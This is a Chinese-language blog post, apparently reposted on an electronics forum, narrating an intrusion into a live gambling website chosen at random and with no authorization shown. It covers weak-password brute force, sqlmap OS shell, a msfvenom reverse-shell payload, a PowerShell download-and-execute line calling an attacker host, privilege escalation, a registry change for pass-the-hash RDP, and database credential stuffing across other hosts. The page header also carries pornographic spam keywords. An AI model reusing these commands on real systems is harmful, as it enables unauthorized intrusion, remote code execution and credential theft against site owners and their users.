日B视频 亚洲,啪啪啪网站一区二区,91色情精品久久,日日噜狠狠色综合久,超碰人妻少妇97在线,999青青视频,亚洲一区二卡,让本一区二区视频,日韩网站推荐

0
  • 聊天消息
  • 系統(tǒng)消息
  • 評(píng)論與回復(fù)
登錄后你可以
  • 下載海量資料
  • 學(xué)習(xí)在線(xiàn)課程
  • 觀(guān)看技術(shù)視頻
  • 寫(xiě)文章/發(fā)帖/加入社區(qū)
會(huì)員中心
創(chuàng)作中心

完善資料讓更多小伙伴認(rèn)識(shí)你,還能領(lǐng)取20積分哦,立即完善>

3天內(nèi)不再提示

某菠菜的滲透測(cè)試操作筆記

jf_hKIAo4na ? 來(lái)源:xz.aliyun ? 2024-01-04 15:54 ? 次閱讀
加入交流群
微信小助手二維碼

掃碼添加小助手

加入工程師交流群

前言

閑著無(wú)聊,網(wǎng)上隨便找了一個(gè)菠菜進(jìn)行簡(jiǎn)單測(cè)試,并做筆記記錄,大佬們輕噴,有什么不足之處請(qǐng)指教。

弱口令

訪(fǎng)問(wèn)網(wǎng)站就是一個(gè)登錄頁(yè)面,沒(méi)有驗(yàn)證碼直接bp開(kāi)啟,成功爆出弱口令admin/123456,直接進(jìn)入后臺(tái)。

7302f86c-a062-11ee-8b88-92fbcf53809c.png

sql注入獲取權(quán)限

翻看了很多功能點(diǎn),在一處功能點(diǎn)發(fā)現(xiàn)上傳接口,并嘗試上傳文件,發(fā)現(xiàn)無(wú)法上傳,加了白名單。直接選擇放棄,繼續(xù)尋找。在某一個(gè)/GroupMember.aspx?gid=參數(shù)上加上單引號(hào),直接報(bào)錯(cuò),SQL注入這不就來(lái)了么。

73161bc2-a062-11ee-8b88-92fbcf53809c.png

說(shuō)干就干,直接SQLMAP

73318f38-a062-11ee-8b88-92fbcf53809c.png

發(fā)現(xiàn)為MSSQL,且DBA權(quán)限,直接--os-shell

734610ca-a062-11ee-8b88-92fbcf53809c.png

上線(xiàn)msf

已經(jīng)獲取普通權(quán)限,接下來(lái)就是上線(xiàn)msf提權(quán)。msf生成powershell腳本,并放置在網(wǎng)站目錄下

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=8888 -f psh-reflection >xx.ps1

73532ea4-a062-11ee-8b88-92fbcf53809c.png

Vps開(kāi)啟監(jiān)聽(tīng)

7359dc90-a062-11ee-8b88-92fbcf53809c.png

使用powershell上線(xiàn)session

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://x.x.x.x/xx.ps1'))"

7361674e-a062-11ee-8b88-92fbcf53809c.png

如果想要通過(guò)url拼接堆疊執(zhí)行powershell會(huì)存在一個(gè)問(wèn)題,就是單引號(hào)閉合問(wèn)題。我們可以通過(guò)對(duì)powershell進(jìn)行編碼一下,這樣就可以繞過(guò)單引號(hào)的問(wèn)題。下面推薦一個(gè)不錯(cuò)的網(wǎng)站。

https://r0yanx.com/tools/java_exec_encode/

提權(quán)

session已經(jīng)上線(xiàn),接下來(lái)目標(biāo)就是獲取system權(quán)限。很幸運(yùn)直接getsystem可以獲取system權(quán)限。如果需要提權(quán)推薦土豆家族提權(quán),實(shí)戰(zhàn)中成功率很高,影響的服務(wù)器版本也很多。

73668378-a062-11ee-8b88-92fbcf53809c.png

遷移一下進(jìn)程,防止進(jìn)程掉線(xiàn)。

73861e72-a062-11ee-8b88-92fbcf53809c.png

遠(yuǎn)程登錄服務(wù)器

發(fā)現(xiàn)服務(wù)器開(kāi)啟3389端口,因?yàn)槭莝ystem權(quán)限,且為2012系統(tǒng),大于2008版本都是無(wú)法抓到明文密碼,直接修改adminnistrator密碼。(實(shí)戰(zhàn)中不推薦直接修改管理員密碼)

739ff342-a062-11ee-8b88-92fbcf53809c.png

73b4aff8-a062-11ee-8b88-92fbcf53809c.png

利用hash遠(yuǎn)程登錄管理員賬號(hào)

因?yàn)槭莣in2012無(wú)法獲取明文密碼,直接修改管理員密碼稍有些不妥。嘗試通過(guò)獲取管理員NTLM遠(yuǎn)程登錄機(jī)器。(并非同一臺(tái),這只是提供一個(gè)思路)

73b9c024-a062-11ee-8b88-92fbcf53809c.png

使用hash遠(yuǎn)程登錄RDP,需要開(kāi)啟"Restricted Admin Mode"

// 開(kāi)啟Restricted Admin mode
REG ADD "HKLMSystemCurrentControlSetControlLsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f


// 查看是否已開(kāi)啟,0x0則表示開(kāi)啟
REG query "HKLMSystemCurrentControlSetControlLsa" | findstr "DisableRestrictedAdmin"

73be3938-a062-11ee-8b88-92fbcf53809c.png

成功利用hash遠(yuǎn)程管理員桌面

73c3bb06-a062-11ee-8b88-92fbcf53809c.png

73c7ec9e-a062-11ee-8b88-92fbcf53809c.png

其他

前期發(fā)現(xiàn)1433端口開(kāi)放著,尋找數(shù)據(jù)庫(kù)配置文件,登錄數(shù)據(jù)庫(kù)。

73d9a8bc-a062-11ee-8b88-92fbcf53809c.png

通過(guò)fofa找了一下,資產(chǎn)還是挺多的,且很多都開(kāi)放1433端口,猜測(cè)會(huì)存在同一個(gè)人部署的網(wǎng)站,嘗試用獲取的密碼對(duì)這些資產(chǎn)的1433端口進(jìn)行爆破,成功撞到幾臺(tái)數(shù)據(jù)庫(kù),且都是sa權(quán)限。結(jié)束。

73f24818-a062-11ee-8b88-92fbcf53809c.png

審核編輯:黃飛

聲明:本文內(nèi)容及配圖由入駐作者撰寫(xiě)或者入駐合作網(wǎng)站授權(quán)轉(zhuǎn)載。文章觀(guān)點(diǎn)僅代表作者本人,不代表電子發(fā)燒友網(wǎng)立場(chǎng)。文章及其配圖僅供工程師學(xué)習(xí)之用,如有內(nèi)容侵權(quán)或者其他違規(guī)問(wèn)題,請(qǐng)聯(lián)系本站處理。 舉報(bào)投訴
  • 服務(wù)器
    +關(guān)注

    關(guān)注

    14

    文章

    10371

    瀏覽量

    91770
  • SQL
    SQL
    +關(guān)注

    關(guān)注

    1

    文章

    807

    瀏覽量

    46962
  • 端口
    +關(guān)注

    關(guān)注

    4

    文章

    1110

    瀏覽量

    34052

原文標(biāo)題:對(duì)某菠菜的滲透測(cè)試筆記

文章出處:【微信號(hào):菜鳥(niǎo)學(xué)安全,微信公眾號(hào):菜鳥(niǎo)學(xué)安全】歡迎添加關(guān)注!文章轉(zhuǎn)載請(qǐng)注明出處。

收藏 人收藏
加入交流群
微信小助手二維碼

掃碼添加小助手

加入工程師交流群

    評(píng)論

    相關(guān)推薦
    熱點(diǎn)推薦

    web滲透測(cè)試流程

      滲透測(cè)試是什么?網(wǎng)絡(luò)安全學(xué)習(xí)中,web滲透測(cè)試流程是怎樣的?后滲透的詳細(xì)步驟解析如何?  滲透
    發(fā)表于 01-29 17:27

    有色Petri網(wǎng)在滲透測(cè)試中的應(yīng)用

    滲透測(cè)試是常用的網(wǎng)絡(luò)安全保障方法。該文細(xì)化現(xiàn)有滲透測(cè)試過(guò)程,針對(duì)傳統(tǒng)滲透測(cè)試模型存在的不足提出一
    發(fā)表于 04-02 09:45 ?10次下載

    cad簡(jiǎn)單操作

    cad實(shí)用操作筆記
    發(fā)表于 12-23 02:15 ?5次下載

    DXP 2004簡(jiǎn)單操作

    DXP 2004實(shí)用操作筆記
    發(fā)表于 12-23 02:15 ?0次下載

    滲透測(cè)試工具開(kāi)發(fā)

    滲透測(cè)試工具開(kāi)發(fā)
    發(fā)表于 09-07 10:30 ?18次下載
    <b class='flag-5'>滲透</b><b class='flag-5'>測(cè)試</b>工具開(kāi)發(fā)

    如何自己制作一個(gè)超聲波測(cè)距模塊詳細(xì)制作筆記資料免費(fèi)下載

    本文檔的主要內(nèi)容詳細(xì)介紹的是如何自己制作一個(gè)超聲波測(cè)距模塊詳細(xì)制作筆記資料免費(fèi)下載。
    發(fā)表于 05-29 17:56 ?10次下載
    如何自己制作一個(gè)超聲波測(cè)距模塊詳細(xì)制<b class='flag-5'>作筆記</b>資料免費(fèi)下載

    如何使用低消耗設(shè)備進(jìn)行破解和滲透測(cè)試的Deck操作模式資料說(shuō)明

    的靈活性。操作員可以攜帶多個(gè)相同的Deck設(shè)備到達(dá)滲透測(cè)試地點(diǎn),現(xiàn)場(chǎng)酌情選擇合適的電源或其他選項(xiàng)(比如無(wú)線(xiàn)網(wǎng)卡、802.15.4貓等)。而不需要按照滲透
    發(fā)表于 05-09 18:15 ?0次下載

    嵌入式C語(yǔ)言的5個(gè)位操作筆記資料說(shuō)明

    本文檔的主要內(nèi)容詳細(xì)介紹的是嵌入式C語(yǔ)言的5個(gè)位操作筆記資料說(shuō)明。
    發(fā)表于 05-08 18:19 ?3次下載
    嵌入式C語(yǔ)言的5個(gè)位<b class='flag-5'>操作筆記</b>資料說(shuō)明

    菠菜為燃料電池供電!大力水手成真!

    大力水手吃菠菜給自己補(bǔ)充能量的畫(huà)面,應(yīng)該是每一個(gè)愛(ài)吃菠菜的小朋友的英雄。 不過(guò),菠菜的能量可不止在動(dòng)畫(huà)片里,最近,菠菜真的能為燃料電池供電了! 這也令研究人員感到驚訝,美國(guó)
    的頭像 發(fā)表于 10-23 16:00 ?2313次閱讀

    基于STM32四軸飛控制作筆記

    這里寫(xiě)自定義目錄標(biāo)題基于STM32四軸飛控制作筆記新的改變功能快捷鍵合理的創(chuàng)建標(biāo)題,有助于目錄的生成如何改變文本的樣式插入鏈接與圖片如何插入一段漂亮的代碼片生成一個(gè)適合你的列表創(chuàng)建一個(gè)表格設(shè)定內(nèi)容
    發(fā)表于 11-30 16:36 ?11次下載
    基于STM32四軸飛控制<b class='flag-5'>作筆記</b>

    白盒滲透測(cè)試的優(yōu)勢(shì)是什么

    滲透測(cè)試是一項(xiàng)重要的進(jìn)攻性安全演習(xí)或操作。如果執(zhí)行得當(dāng),它會(huì)極大地提高您組織的安全性。滲透測(cè)試分為三種類(lèi)型,根據(jù)
    的頭像 發(fā)表于 09-19 10:04 ?1920次閱讀

    使用超聲波傳感器制作筆記本電腦觸摸板HCSR 04

    電子發(fā)燒友網(wǎng)站提供《使用超聲波傳感器制作筆記本電腦觸摸板HCSR 04.zip》資料免費(fèi)下載
    發(fā)表于 10-31 09:58 ?0次下載
    使用超聲波傳感器制<b class='flag-5'>作筆記</b>本電腦觸摸板HCSR 04

    滲透測(cè)試和邊緣

    滲透測(cè)試和邊緣
    的頭像 發(fā)表于 01-03 09:45 ?1283次閱讀
    <b class='flag-5'>滲透</b><b class='flag-5'>測(cè)試</b>和邊緣

    11款專(zhuān)家級(jí)滲透測(cè)試工具

    回顧過(guò)去,黑客入侵異常困難,需要大量手動(dòng)操作。然而,如今,一整套自動(dòng)化測(cè)試工具讓黑客變成了“半機(jī)械人”,能夠比以往任何時(shí)候都進(jìn)行更多的測(cè)試。以下11款專(zhuān)家級(jí)滲透
    的頭像 發(fā)表于 03-07 10:51 ?4530次閱讀

    如何使用DudeSuite進(jìn)行滲透測(cè)試工作

    Dude Suite 是一款集成化的Web滲透測(cè)試工具集,包含了Web滲透測(cè)試活動(dòng)中使用頻率非常高的功能,可以幫助我們高效地完成對(duì)Web應(yīng)用程序的
    的頭像 發(fā)表于 06-13 09:04 ?3160次閱讀
    如何使用DudeSuite進(jìn)行<b class='flag-5'>滲透</b><b class='flag-5'>測(cè)試</b>工作
    石林| 濮阳县| 罗田县| 额尔古纳市| 尚志市| 镇巴县| 清涧县| 高唐县| 宁海县| 繁峙县| 九龙城区| 大姚县| 乐安县| 嘉定区| 富平县| 城步| 深州市| 柘荣县| 韶山市| 辛集市| 大兴区| 无锡市| 靖安县| 新余市| 镇康县| 平山县| 内黄县| 黔西县| 宝坻区| 桃江县| 哈尔滨市| 财经| 徐汇区| 尉氏县| 新干县| 时尚| 清远市| 青岛市| 正蓝旗| 运城市| 合作市|